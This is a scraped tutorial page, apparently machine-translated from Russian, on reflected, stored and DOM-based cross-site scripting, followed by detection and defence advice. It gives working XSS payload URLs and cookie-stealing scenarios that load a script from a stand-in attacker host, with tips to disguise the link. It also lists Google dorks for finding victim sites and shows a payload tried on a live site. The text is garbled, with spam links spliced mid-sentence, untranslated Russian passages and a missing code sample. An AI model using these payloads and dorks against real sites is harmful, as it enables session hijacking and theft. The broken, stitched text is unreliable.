Let's take this code as an example:</p><p> <!DOCTYPE html> <html> <head> <title>site:::DOM XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default">An error occurred...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>Then in the browser we will see:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Page source code:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>Let's form the address like this:</p><p>http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)</script>; </p><p>Now the page looks like this:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>But let's take a look at <a href="https://bar812.ru/en/razrabotka-sistemy-avtomaticheskogo-poiska-obektov-na-izobrazhenii-eclipse--.html">source</a> HTML:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>There absolutely nothing has changed. This is what I was talking about, we need to look at the DOM structure of the document in order to identify malicious code:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>Here is a working XSS prototype, for a real attack we need a more complex payload, which is not possible due to the application stopping reading right after the semicolon, and something like <b>alert(1); alert(2)</b> already impossible. However, thanks to <b>unescape()</b> in the returned data, we can use a payload like this:</p><p>http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)%3balert(2)</script>; </p><p>Where we have replaced the symbol <b>; </b> to the URI-encoded equivalent!</p> <p>We can now write a malicious JavaScript payload and compose a link to send to the victim, just like standard non-persistent cross-site scripting does.</p> <h2>XSS Auditor <br></h2> <p>AT <a href="https://bar812.ru/en/skachat-gugl-hrom-obnovlennaya-versiya-usloviya-predostavleniya-uslug-google-chrome.html">Google Chrome</a>(and also in Opera, which now uses the Google Chrome engine), I was in for this surprise:</p> <blockquote> <p>dom_xss.html:30 The XSS Auditor refused to execute a script in "http://localhost/tests/XSS/dom_xss.html#input=token‹script›alert(1)</script>;" because its source code was found within the request. The auditor was enabled as the server sent neither an "X-XSS-Protection" nor "Content-Security-Policy" header.</p> </blockquote> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>Those. the browser now has an XSS auditor that will try to prevent XSS. Firefox doesn't have this functionality yet, but I think it's a matter of time. If the implementation in browsers is successful, then we can talk about a significant difficulty in applying XSS.</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>It is useful to remember that <a href="https://bar812.ru/en/chto-znachit-rezhim-turbo-v-brauzerah-kak-vklyuchaetsya-i-kak-rabotaet-chto.html">modern browsers</a> are taking steps to limit the level of exploitation of issues such as non-persistent XSS and DOM-based XSS. This is also something to keep in mind when testing websites using a browser - it may well turn out that a web application is vulnerable, but you do not see a confirmation pop-up just because the browser blocks it.</p> <h2>XSS Exploitation Examples <br></h2> <p>Attackers intending to exploit cross-site scripting vulnerabilities must approach each vulnerability class differently. The attack vectors for each class are described here.</p> <p>For XSS vulnerabilities, attacks can use BeEF, which extends the attack from the website to the users' local environment.</p> <p><b>An example of a non-persistent XSS attack</b></p> <p>1. Alice frequently visits a certain website hosted by Bob. Bob's website allows Alice to log in with a username/password and store sensitive data such as billing information. When a user logs in, the browser stores authorization cookies, which look like nonsensical characters, i.e. both computers (client and server) remember that she entered.</p> <p>2. Malory notes that Bob's website contains a non-persistent XSS vulnerability:</p> <p>2.1 When visiting the search page, she enters a search string and clicks on the submit button, if no results are found, the page displays the entered search string followed by the words "not found" and the url looks like <b>http://bobssite.org?q=her <a href="https://bar812.ru/en/servis-dlya-gruppirovki-klyuchevyh-zaprosov-klasterizaciya.html">search query</a> </b></p> <p>2.2 With a normal search query like the word " <b>dogs</b>» the page simply renders « <b>dogs</b> not found" and url http://bobssite.org?q= <b>dogs</b>, which is quite normal behavior.</p> <p>2.3 However, when an anomalous search term like <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 A warning message appears (that says "xss").</p> <p>2.3.2 Page displays <b><script type="text/javascript">alert("xss");</script> not found</b> along with an error message with the text "xss".</p> <p>2.3.3 exploitable url <b>http://bobssite.org?q=<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Mallory constructs a URL to exploit the vulnerability:</p> <p>3.1 She makes a URL <b>http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>. She may choose to convert ASCII characters to hexadecimal format such as <b>http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E</b> to prevent people from immediately decrypting the malicious URL.</p> <p>3.2 She emails some unsuspecting members of Bob's site saying "Check out the cool dogs".</p> <p>4. Alice receives a letter. She loves dogs and clicks on the link. She goes to Bob's site in a search, she doesn't find anything, it says "dogs not found", and in the very middle a tag with a script is launched (it is invisible on the screen), downloads and executes Mallory's program authstealer.js (XSS attack triggered). Alice forgets about it.</p> <p>5. The authstealer.js program runs in Alice's browser as if it originated from Bob's website. She grabs a copy of Alice's authorization cookie and sends it to Mallory's server, where Mallory retrieves them.</p> <p>7. Now that Mallory is inside, she goes to the payment section of the website, looks, and steals a copy of the number. <a href="https://bar812.ru/en/rabochaya-shema-po-uvodu-deneg-s-kreditnyh-kart-sberbanka-cherez-bilain.html">credit card</a> Alice. She then goes and changes the password, i.e. now Alice can't even come in anymore.</p> <p>8. She decides to take the next step and sends the link constructed in this way to Bob himself, and thus gains administrative privileges for Bob's site.</p> <p><b>Attack with persistent XSS</b></p> <ol><li>Mallory has an account on Bob's website.</li> <li>Mallory notices that Bob's website contains a permanent XSS vulnerability. If you are moving to <a href="https://bar812.ru/en/kak-skopirovat-disk-s-vindoi-kak-perenesti-operacionnuyu-sistemu-na.html">new section</a>, post a comment, it displays whatever is typed into it. But if the comment text contains HTML tags, those tags will be rendered as is, and any script tags will run.</li> <li>Malory reads the article in the News section and writes a comment in the Comments section. She inserts the text into the comment:</li> <li>In this story, I really liked the dogs. They are so nice! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>When Alice (or anyone else) loads the page with this comment, Mallory's script tag runs and steals Alice's authorization cookie, sends it to Mallory's secret server for collection.</li> <li>Malory can now hijack Alice's session and impersonate Alice.</li> </ol><h2>Finding sites vulnerable to XSS <br></h2> <p><b>Dorks for XSS</b></p> <p>The first step is to select the sites on which we will perform XSS attacks. Sites can be searched using Google dorks. Here are a few of these dorks that you can copy and paste into Google search:</p> <ul><li>inurl:search.php?q=</li> <li>inurl:.php?q=</li> <li>inurl:search.php</li> <li>inurl:.php?search=</li> </ul><p>A list of sites will open in front of us. You need to open the site and find input fields on it, such as a form <a href="https://bar812.ru/en/ubitye-muzhchiny-memberlist-php-form-forma-obratnoi-svyazi-na-php-s-otpravkoi-na.html">feedback</a>, input form, site search, etc.</p> <p>I will immediately note that it is practically useless to look for vulnerabilities in popular automatically updated web applications. A classic example of such an application is WordPress. In fact, there are vulnerabilities in WordPress, and in particular in its plugins. Moreover, there are many sites that do not update either the WordPress engine (due to the fact that the webmaster made some changes to the source code), or plugins and themes (usually these are pirated plugins and themes). But if you are reading this section and learning something new from it, then WordPress is not for you yet ... We will definitely return to it later.</p> <p>The best targets are a variety of self-written engines and scripts.</p> <p>You can select as payload to insert</p><p> <script>alert(1)</script> </p><p>Pay attention to which HTML code tags your embedded code falls into. Here is an example of a typical input field ( <b>input</b>):</p><p> <input type="text" class="ui-input query" name="q" value="pillowcase"/><script>alert(1)</script><input value="" /> </p><p>Our payload will go where the word "pillowcase" is now. Those. turn into tag value <b>input</b>. We can avoid it - let's close <a href="https://bar812.ru/en/escape-simvol-dvoinoi-kavychki-v-xml-moi-lyubimyi-sposob.html">double quote</a>, and then the tag itself with <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>Let's try it for some site:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>OK, there is a vulnerability.</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>Programs for finding and scanning XSS vulnerabilities <br></h2> <p>Probably all web application scanners have a built-in XSS vulnerability scanner. This topic is not covered, it is better to get acquainted with each such scanner separately.</p> <p>We all know what cross-site scripting is, right? This is a vulnerability in which an attacker sends malicious data (usually HTML containing Javascript code) that is later returned by the application, causing the Javascript code to be executed. So, this is not true! There is a type of XSS attack that doesn't fit this definition, at least in the basic fundamentals. XSS attacks, as defined above, are divided into instant (malicious data is embedded in a page that is returned to the browser immediately after the request) and delayed (malicious data is returned after some time). But there is a third type of XSS attack that is not based on sending malicious data to the server. Although it seems counterintuitive, there are two well-documented examples of such an attack. This article describes the third type of XSS attacks - XSS through DOM (DOM Based XSS). Nothing fundamentally new about the attack will be written here, but rather the innovation of this material in highlighting the distinctive features of the attack, which are very important and interesting.</p> <p>Developers and users of application applications should understand the principles of XSS attack through the DOM, as it poses a threat to <a href="https://bar812.ru/en/prilozhenie-b-sozdanie-shablonov-web-uzla-shablony-dlya-sozdaniya-web-uzlov-chto.html">web applications</a> and is different from normal XSS. There are many web applications on the Internet that are vulnerable to XSS through the DOM and at the same time tested for XSS and found to be “immune” to this type of attack. Developers and site administrators should become familiar with methods for detecting and protecting against XSS through the DOM, as these techniques differ from those used when dealing with standard XSS vulnerabilities.</p> <h3>Introduction</h3> <p>The reader should be familiar with the basic principles of XSS attacks (, , , , ). XSS usually refers to instant () and delayed cross-site scripting. With instant XSS, malicious code (Javascript) is returned by the attacked server immediately as a response to an HTTP request. Delayed XSS means that the malicious code is stored on the attacked system and can later be injected into <a href="https://bar812.ru/en/grafika-na-web-stranice-v-html-dobavlyaem-izobrazheniya-na-web-stranicu-a-eshche.html">HTML page</a> vulnerable system. As mentioned above, this classification assumes that a fundamental property of XSS is that malicious code is sent from the browser to the server and returned to the same browser (immediate XSS) or any other browser (delayed XSS). This article raises the issue that this is a misclassification. The possibility of an XSS attack that does not rely on injecting code into the page returned by the server would have a major impact on protection and detection methods. The principles of such attacks are discussed in this article.</p> <h3>Example and comments</h3> <p>Before describing the simplest attack scenario, it is important to emphasize that the methods described here have already been repeatedly demonstrated publicly (for example, , and ). I do not claim that the methods below are described for the first time (although some of them differ from previously published materials).</p> <p>An indication of a vulnerable site is the presence of an HTML page that uses data from document.location, document.URL, or document.referrer (or any other objects that an attacker can influence) in an insecure way.</p> <p>Note for readers unfamiliar with these <a href="https://bar812.ru/en/prodvinutaya-rabota-s-obektom-event-na-javascript-vvedenie-v-vsplyvayushchie-sobytiya.html">Javascript objects</a>: When Javascript code is executed in the browser, it accesses several objects represented within the DOM (Document Object Model - <a href="https://bar812.ru/en/osnovy-raboty-s-dom-v-javascript-rabota-s-dom-modelyu-obektnaya-model-dom.html">Object Model</a> document). The document object is the most important of these objects and provides access to most of the page's properties. This object contains many nested objects such as location, URL and referrer. They are managed by the browser according to the browser's point of view (this is quite significant, as will be seen below). So document.URL and document.location contain the URL of the page, or rather what the browser means by URL. Note that these objects are not taken from the body of the HTML page. The document object contains a body object containing the parsed HTML code for the page.</p> <p>It's not hard to find an HTML page containing Javascript code that parses a URL string (having accessed it via document.URL or document.location) and performs some client-side action based on its value. Below is an example of such code.</p> <p>By analogy with the example in c, consider the following HTML page (assume that this is the content <span>http://www.vulnerable.site/welcome.html</span>):</p> <p><HTML> <TITLE>Welcome!</TITLE> Hi<SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR>Welcome to our system…</HTML></p> <p>However, a query like this -</p> <p>http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script></p> <p>would call XSS. Let's see why: the victim's browser, which received this link, sends an HTTP request to www.vulnerable.site and receives the above (static!) HTML page. The victim's browser starts parsing this HTML code. The DOM contains a document object that has a URL field, and that field is populated with the URL value <a href="https://bar812.ru/en/gde-hranyatsya-kuki-v-hrome-gde-chrome-hranit-kuki-prosmotr-cookie-dlya.html">current page</a> in the process <a href="https://bar812.ru/en/sozdanie-dom-uzlov-s-pomoshchyu-js-udalit---kak-vstavit-element-posle-drugogo.html">DOM creation</a>. When the parser reaches the Javascript code, it executes it, which causes the HTML code of the rendered page to be modified. In this case, the code refers to document.URL, and since part of this string is embedded in the HTML during parsing, which is immediately parsed, the detected code (alert(…)) is executed in the context of the same page.</p> <p>Notes:</p> <p>1. Malicious code is not embedded in the HTML page (unlike other forms of XSS). <br>2. This exploit will work as long as the browser does not modify URL characters. Mozilla automatically encodes the ‘<’ и ‘>' (in %3C and %3E respectively) in nested document. If the URL was typed directly into the address bar, that browser is immune to the attack described in this example. However, if the attack does not require the ‘<’ и ‘>’ (in its original unencoded form) the attack can be carried out. Microsoft <a href="https://bar812.ru/en/pereustanovka-internet-explorer-v-windows-10-vosstanovlenie-internet-explorer.html">Internet Explorer</a> 6.0 does not encode ‘<’ и ‘>’ and is therefore vulnerable to the described attack without any restrictions. However, there are many different attack scenarios that do not require ‘<’ и ‘>', and therefore even Mozilla is not immune to this attack.</p> <h3>Methods for detecting and preventing vulnerabilities of this type</h3> <p>In the example above, the malicious code is still passed to the server (as part of the HTTP request), so the attack can be detected just like any other XSS attack. But this is a solvable problem.</p> <p>Consider the following example:</p> <p>http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)<script></p> <p>Обратите внимание на символ ‘#’ справа от имени файла. Он говорит браузеру, что все после этого символа не является частью запроса. Microsoft Internet Explorer (6.0) и Mozilla не отправляет фрагмент после символа ‘#’ на сервер, поэтому для сервера этот запрос будет эквивалентен http://www.vulnerable.site/welcome.html, т.е. злонамеренный код даже не будет замечен сервером. Таким образом, благодаря этому приему, браузер не отправляет злонамеренную полезную нагрузку на сервер.</p> <p>Но все же в некоторых случаях невозможно скрыть полезную нагрузку: в и злонамеренная полезная нагрузка является частью имени пользователи (username) в URL типа http://username@host/. В этом случае браузер отправляет запрос с заголовком Authorization, содержащий имя пользователи (злонамеренная полезная нагрузка), в результате чего злонамеренный код попадает на сервер (закодированный с помощью Base64 – следовательно IDS/IPS для обнаружения атаки должны вначале декодировать эти данные). Однако сервер не обязан внедрять эту полезную нагрузку в одну из доступных HTML страниц, хотя это является необходимым условием выполнения XSS атаки.</p> <p>Очевидно, что в ситуациях, когда полезная нагрузка может быть полностью скрыта, средства обнаружения (IPS) и предотвращения (IPS, межсетевые экраны для web приложений) не могут полностью защитить от этой атаки. Даже если полезную нагрузку нужно отсылать на сервер, во многих случаях для избежания обнаружения она может быть преобразована определенным образом. Например, если какой-то параметр защищен (к примеру, параметр name в примере выше), небольшое изменение сценария атаки может принести результат:</p> <p><script>(document.cookie)</script></p> <p>A stricter security policy would require that the name parameter be sent. In this case, you can make the following request:</p> <p>http://www.vulnerable.site/welcome.html?notname= <script>alert(document.cookie) <script>&name=Joe</p> <p>If the security policy restricts additional parameter names (for example: foobar), you can use the following option:</p> <p>http://www.vulnerable.site/welcome.html?foobar=name= <script>alert(document.cookie) <script>&name=Joe</p> <p>Note that the ignored parameter (foobar) must come first and contain the payload in its value.</p> <p>The attack scenario described in , is even more preferable for the attacker, since the full value of document.location is written into the HTML page (Javascript code does not search for a specific parameter name). Thus, an attacker can completely hide the payload by sending the following:</p> <p>/attachment.cgi?id=&action=foobar#<script>alert(document.cookie)</script></p> <p>Even if the payload is parsed by the server, protection can only be guaranteed if the request is denied or the response is replaced with some error text. Referring again to and : if the Authorization header is simply removed by the intermediate security system, it will have no effect if the original page is returned. Likewise, any attempt to process data on the server, by removing or encoding illegal characters, will be ineffective against this attack.</p> <p>In the case of document.referrer, the payload is sent to the server via the Referer header. However, if the user's browser or intermediate protection removes this header, there will be no trace of an attack that can go completely unnoticed.</p> <p>Summing up, we conclude that <a href="https://bar812.ru/en/bannernaya-reklama-sozdat-sozdat-banner-besplatno-onlain.html">traditional methods</a>, namely</p> <p>1. HTML data encoding on the server side <br>2. Removing/encoding forbidden inputs on the server side does not work against DOM XSS.</p> <p>Automatic vulnerability discovery by bombarding with malicious data (sometimes called fuzzing) will not work because programs using this technique typically infer whether or not the embedded data is present in the returned page (instead of executing code in the context of the browser on client side and monitoring the results). However, if the program can statically parse the Javascript code found on the page, it may indicate suspicious signs (see below). And of course, if the security tools can execute Javascript code (and correctly initialize DOM objects) or emulate such execution, they will be able to detect this attack.</p> <p>Manually searching for the vulnerability using a browser will also work, as the browser can execute client-side Javascript code. Vulnerability finders can take advantage of this technique and execute client-side code to monitor the results of its execution. <br>Effective protection</p> <p>Avoid client-side document rewrites, redirects, or similar actions that use client-side data. Most of these actions can be done using <a href="https://bar812.ru/en/dinamicheskaya-zagruzka-stranicy-lenivaya-zagruzka-kontenta-na-lendinge.html">dynamic pages</a>(on the server side). <br> 2.</p> <p>Analysis and improvement of code security (Javascript) on the client side. References to DOM objects that can be influenced by the user (attacker) must be carefully checked. Particular attention should be paid to the following objects (but not limited to): <br>*document.URL <br>*document.URLUnencoded <br>* document.location (and its properties) <br>*document.referrer <br>* window.location (and its properties)</p> <p>Note that the properties of the document and window objects can be referenced in several ways: explicitly (example is window.location), implicitly (example is location), or by getting a handle and using it (example is handle_to_some_window.location).</p> <p>Particular attention should be paid to code where the DOM is modified, either explicitly or potentially, and through direct access to HTML or through access directly to the DOM. Examples (this is by no means an exhaustive list): <br>* Entry in the HTML code of the page: <br>o document.write(…) <br>o document.writeln(…) <br>o document.body.innerHtml=… <br>* Change DOM directly (including DHTML events): <br>o document.forms.action=… (and other variations) <br>document.attachEvent(…) <br>o document.create…(…) <br>document.execCommand(…) <br>o document.body. ... (accessing the DOM through the body object) <br>window.attachEvent(…) <br>* Change Document URL: <br>o document.location=… (as well as setting the href, host, and hostname values of the location object) <br>document.location.hostname=… <br>o document.location.replace(...) <br>document.location.assign(…) <br>document.URL=… <br>window.navigate(…) <br>* Opening/modifying the window object: <br>o document.open(…) <br>window.open(…) <br>o window.location.href=… (as well as setting the host and hostname of the location object) <br>* Executing the script directly: <br>eval(…) <br>window.execScript(...) <br>window.setInterval(…) <br>window.setTimeout(…)</p> <p>Continuing with the above example, for effective protection, the original script can be replaced by the following code, which checks the string written to the HTML page for only alphanumeric characters.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> </div> </div> </div> </div> </article> <script type="text/javascript"> try { var sbmt = document.getElementById('submit'), npt = document.createElement('input'), d = new Date(), __ksinit = function() { sbmt.parentNode.insertBefore(npt, sbmt); }; npt.value = d.getUTCDate() + '' + (d.getUTCMonth() + 1) + 'uniq9065'; npt.name = 'ksbn_code'; npt.type = 'hidden'; sbmt.onmousedown = __ksinit; sbmt.onkeypress = __ksinit; } catch (e) {} </script> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container "> <div class="td-pb-row "> <div class="td-pb-span td-sub-footer-menu "></div> <div class="td-pb-span td-sub-footer-copy ">2022 bar812.ru. Just about the complex. Programs. Iron. Internet. Windows</div> </div> </div> </div> </div> <script data-cfasync="false" type="text/javascript"> if (window.addthis_product === undefined) { window.addthis_product = "wpwt"; } if (window.wp_product_version === undefined) { window.wp_product_version = "wpwt-3.1.2"; } if (window.wp_blog_version === undefined) { window.wp_blog_version = "4.9.1"; } if (window.addthis_share === undefined) { window.addthis_share = {}; } if (window.addthis_config === undefined) { window.addthis_config = { "data_track_clickback": true, "ui_language": "ru", "ui_atversion": "300" }; } if (window.addthis_plugin_info === undefined) { window.addthis_plugin_info = { "info_status": "enabled", "cms_name": "WordPress", "plugin_name": "Website Tools by AddThis", "plugin_version": "3.1.2", "plugin_mode": "AddThis", "anonymous_profile_id": "wp-f2d21fd70bfc0c32605b4e5e1e4ff912", "page_info": { "template": "posts", "post_type": "" }, "sharing_enabled_on_post_via_metabox": false }; } (function() { var first_load_interval_id = setInterval(function() { if (typeof window.addthis !== 'undefined') { window.clearInterval(first_load_interval_id); if (typeof window.addthis_layers !== 'undefined' && Object.getOwnPropertyNames(window.addthis_layers).length > 0) { window.addthis.layers(window.addthis_layers); } if (Array.isArray(window.addthis_layers_tools)) { for (i = 0; i < window.addthis_layers_tools.length; i++) { window.addthis.layers(window.addthis_layers_tools[i]); } } } }, 1000) }()); </script> <script type='text/javascript'> var tocplus = { "smooth_scroll": "1", "visibility_show": "\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c", "visibility_hide": "\u0441\u043a\u0440\u044b\u0442\u044c", "width": "Auto" }; </script> <script type='text/javascript' src='https://bar812.ru/wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=bbebb9a04042e1d7d3625bab0b5e9e4f'></script> <script> (function() { var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = '/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = '/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm, ''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> <div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar"> <header> <a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a> <div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div> </header> <div class="tdw-content"> <div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active"> <script> (function(jQuery, undefined) { jQuery(window).ready(function() { if ('undefined' !== typeof tdcAdminIFrameUI) { var $liveIframe = tdcAdminIFrameUI.getLiveIframe(); if ($liveIframe.length) { $liveIframe.load(function() { $liveIframe.contents().find('body').append('<textarea class="tdw-css-writer-editor" style="display: none"></textarea>'); }); } } }); })(jQuery); </script> <textarea class="tdw-css-writer-editor td_live_css_uid_1_5a5dc1e76f1d6"></textarea> <div id="td_live_css_uid_1_5a5dc1e76f1d6" class="td-code-editor"></div> <script> jQuery(window).load(function() { if ('undefined' !== typeof tdLiveCssInject) { tdLiveCssInject.init(); var editor_textarea = jQuery('.td_live_css_uid_1_5a5dc1e76f1d6'); var languageTools = ace.require("ace/ext/language_tools"); var tdcCompleter = { getCompletions: function(editor, session, pos, prefix, callback) { if (prefix.length === 0) { callback(null, []); return } if ('undefined' !== typeof tdcAdminIFrameUI) { var data = { error: undefined, getShortcode: '' }; tdcIFrameData.getShortcodeFromData(data); if (!_.isUndefined(data.error)) { tdcDebug.log(data.error); } if (!_.isUndefined(data.getShortcode)) { var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g, results = data.getShortcode.match(regex); var elClasses = {}; for (var i = 0; i < results.length; i++) { var currentClasses = results[i] .replace('el_class="', '') .replace('"', '') .split(' '); for (var j = 0; j < currentClasses.length; j++) { if (_.isUndefined(elClasses[currentClasses[j]])) { elClasses[currentClasses[j]] = ''; } } } var arrElClasses = []; for (var prop in elClasses) { arrElClasses.push(prop); } callback(null, arrElClasses.map(function(item) { return { name: item, value: item, meta: 'in_page' } })); } } } }; languageTools.addCompleter(tdcCompleter); window.editor = ace.edit("td_live_css_uid_1_5a5dc1e76f1d6"); // 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook) // We did it to reattach the existing compiled css to the new content received from server. window.editorChangeHandler = function() { //tdwState.lessWasEdited = true; window.onbeforeunload = function() { if (tdwState.lessWasEdited) { return "You have attempted to leave this page. Are you sure?"; } return false; }; var editorValue = editor.getSession().getValue(); editor_textarea.val(editorValue); if ('undefined' !== typeof tdcAdminIFrameUI) { tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue); // Mark the content as modified // This is important for showing info when composer closes tdcMain.setContentModified(); } tdLiveCssInject.less(); }; editor.getSession().setValue(editor_textarea.val()); editor.getSession().on('change', editorChangeHandler); editor.setTheme("ace/theme/textmate"); editor.setShowPrintMargin(false); editor.getSession().setMode("ace/mode/less"); editor.setOptions({ enableBasicAutocompletion: true, enableSnippets: true, enableLiveAutocompletion: false }); } }); </script> </div> </div> <footer> <a href="#" class="tdw-save-css">Save</a> <div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div> <div class="tdw-resize"></div> </footer> </div> <script type="text/javascript" defer src="https://bar812.ru/wp-content/cache/autoptimize/js/autoptimize_d85127d8732b44d62e81e0455b3d3cb7.js"></script> </body> </html>